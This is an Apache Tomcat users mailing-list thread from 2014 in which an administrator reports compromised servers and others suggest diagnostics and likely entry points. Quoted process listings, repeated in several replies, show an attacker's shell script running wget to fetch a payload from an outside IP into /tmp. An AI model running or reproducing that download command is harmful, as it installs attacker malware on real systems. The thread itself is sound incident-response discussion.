> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> > <ls...@gmail.com>:
> >> Hello Dan,
> >>
> >> Nop, the attacker is executing locally the following
> >>
> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>
> >> And the launch squid who tries to connect via ssh to varoius
> >> places.
> >>
> >> Right now its time to leave the office, but in a few hours i will
> >> paste in pastebin access logs, config files, wherever you tell
> >> me.
> >>
> >> This is my pstree
> >>
> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >> ├─java─┬─sh───wget │ └─263*[{java}]
> >
> > sh launched by tomcat's java?
>
> Yes: please verify that it's the JVM running Tomcat, and not just any
> JVM process.
>
> > Take a thread dump:
> >
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >
> > It shall show what is stacktrace in thread that launched external
> > process.
>
> +1
>
> The only things that ship with Tomcat that call Process.exec() are the
> CGI servlet and SSI, both of which are disabled by default. So, either
> you have an insecure CGI/SSI configuration, your web application has a
> vulnerability, or you have deployed something like the Manager
> application and improperly-secured it.
>
> A classic example of such an intrusion might be that someone got a
> foothold elsewhere into your network, and the Manager web application
> is not properly secured with a password, etc.
>
> - -chris
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
> lvJcfOhzHLwo07Pv+y3J
> =EiX9
> -----END PGP SIGNATURE-----
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Christopher Schultz <ch...@christopherschultz.net>.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Konstantin,
On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> <ls...@gmail.com>:
>> Hello Dan,
>>
>> Nop, the attacker is executing locally the following
>>
>> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
>> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
>> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>
>> And the launch squid who tries to connect via ssh to varoius
>> places.
>>
>> Right now its time to leave the office, but in a few hours i will
>> paste in pastebin access logs, config files, wherever you tell
>> me.
>>
>> This is my pstree
>>
>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
>> ├─java─┬─sh───wget │ └─263*[{java}]
>
> sh launched by tomcat's java?
Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.
> Take a thread dump:
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>
> It shall show what is stacktrace in thread that launched external
> process.
+1
The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.
A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.
- -chris
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
lvJcfOhzHLwo07Pv+y3J
=EiX9
-----END PGP SIGNATURE-----
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Konstantin Kolinko <kn...@gmail.com>.
2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello Dan,
>
> Nop, the attacker is executing locally the following
>
> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>
> And the launch squid who tries to connect via ssh to varoius places.
>
> Right now its time to leave the office, but in a few hours i will paste in
> pastebin access logs, config files, wherever you tell me.
>
> This is my pstree
>
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> init─┬─atd
> ├─java─┬─sh───wget
> │ └─263*[{java}]
sh launched by tomcat's java?
Take a thread dump:
https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
It shall show what is stacktrace in thread that launched external process.
Best regards,
Konstantin Kolinko
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
sorry, but i forget to post
/usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-04-29 17:41 GMT-03:00 Leonardo Santagostini <ls...@gmail.com>:
> Hello Dan,
>
> Nop, the attacker is executing locally the following
>
> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>
> And the launch squid who tries to connect via ssh to varoius places.
>
> Right now its time to leave the office, but in a few hours i will paste in
> pastebin access logs, config files, wherever you tell me.
>
> This is my pstree
>
> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> init─┬─atd
> ├─atop
> ├─crond
> ├─dbus-daemon
> ├─events/0
> ├─events/1
> ├─events/2
> ├─events/3
> ├─httpd───8*[httpd]
> ├─irqbalance
> ├─2*[iscsid]
> ├─iscsiuio───3*[{iscsiuio}]
> ├─java─┬─sh───wget
> │ └─263*[{java}]
> ├─khelper
>
> By the way, logfiles are really big, 200 mb each one, ill try to set up a
> dropbox account so i can share it.
>
> Thanks and regards
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
>
>
>
> 2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dm...@gopivotal.com>:
>
> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <
>> lsantagostini@gmail.com> wrote:
>>
>> > Hello list,
>> >
>> > Im facing an issue in 6 tomcat server that are getting penetrated and
>> they
>> > are executing malicious scripts on my server.
>>
>> Can you share more about what they are doing? It might give some clues
>> as to how they are accessing your machines. For example, if they are
>> deploying a WAR file to your server, it could mean that they have access to
>> the Manager application on your server.
>>
>> Any details you can share, might be helpful.
>>
>> > Im using 7.0.53 on my servers. Running Centos 5.8
>> >
>> > Let me know what information you need.
>>
>> Do you have an access log? If not, enable one. If the attacker is not
>> deleting it, it could show you more about who they are and what requests
>> they are executing to access your server. Assuming they are entering
>> through your application and not some other way.
>>
>> Dan
>>
>> >
>> > PS: This is my first mail to this list, so i apologize for this not
>> gentle
>> > presentation.
>> >
>> > Saludos.-
>> > Leonardo Santagostini
>> >
>> > <http://ar.linkedin.com/in/santagostini>
>>
>>
>> ---------------------------------------------------------------------
>> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
>> For additional commands, e-mail: users-help@tomcat.apache.org
>>
>>
>
Re: Regarding i think an intrusion
Posted by Leonardo Santagostini <ls...@gmail.com>.
Hello Dan,
Nop, the attacker is executing locally the following
tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
tomcat 8893 8882 0 Apr27 ? 00:00:00 wget
http://218.199.102.59/.xy/squid32 -O /tmp/squid
And the launch squid who tries to connect via ssh to varoius places.
Right now its time to leave the office, but in a few hours i will paste in
pastebin access logs, config files, wherever you tell me.
This is my pstree
[root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
init─┬─atd
├─atop
├─crond
├─dbus-daemon
├─events/0
├─events/1
├─events/2
├─events/3
├─httpd───8*[httpd]
├─irqbalance
├─2*[iscsid]
├─iscsiuio───3*[{iscsiuio}]
├─java─┬─sh───wget
│ └─263*[{java}]
├─khelper
By the way, logfiles are really big, 200 mb each one, ill try to set up a
dropbox account so i can share it.
Thanks and regards
Saludos.-
Leonardo Santagostini
<http://ar.linkedin.com/in/santagostini>
2014-04-29 17:34 GMT-03:00 Daniel Mikusa <dm...@gopivotal.com>:
> On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <
> lsantagostini@gmail.com> wrote:
>
> > Hello list,
> >
> > Im facing an issue in 6 tomcat server that are getting penetrated and
> they
> > are executing malicious scripts on my server.
>
> Can you share more about what they are doing? It might give some clues as
> to how they are accessing your machines. For example, if they are
> deploying a WAR file to your server, it could mean that they have access to
> the Manager application on your server.
>
> Any details you can share, might be helpful.
>
> > Im using 7.0.53 on my servers. Running Centos 5.8
> >
> > Let me know what information you need.
>
> Do you have an access log? If not, enable one. If the attacker is not
> deleting it, it could show you more about who they are and what requests
> they are executing to access your server. Assuming they are entering
> through your application and not some other way.
>
> Dan
>
> >
> > PS: This is my first mail to this list, so i apologize for this not
> gentle
> > presentation.
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
> For additional commands, e-mail: users-help@tomcat.apache.org
>
>
Re: Regarding i think an intrusion
Posted by Daniel Mikusa <dm...@gopivotal.com>.
On Apr 29, 2014, at 12:08 PM, Leonardo Santagostini <ls...@gmail.com> wrote:
> Hello list,
>
> Im facing an issue in 6 tomcat server that are getting penetrated and they
> are executing malicious scripts on my server.
Can you share more about what they are doing? It might give some clues as to how they are accessing your machines. For example, if they are deploying a WAR file to your server, it could mean that they have access to the Manager application on your server.
Any details you can share, might be helpful.
> Im using 7.0.53 on my servers. Running Centos 5.8
>
> Let me know what information you need.
Do you have an access log? If not, enable one. If the attacker is not deleting it, it could show you more about who they are and what requests they are executing to access your server. Assuming they are entering through your application and not some other way.
Dan
>
> PS: This is my first mail to this list, so i apologize for this not gentle
> presentation.
>
> Saludos.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@tomcat.apache.org
For additional commands, e-mail: users-help@tomcat.apache.org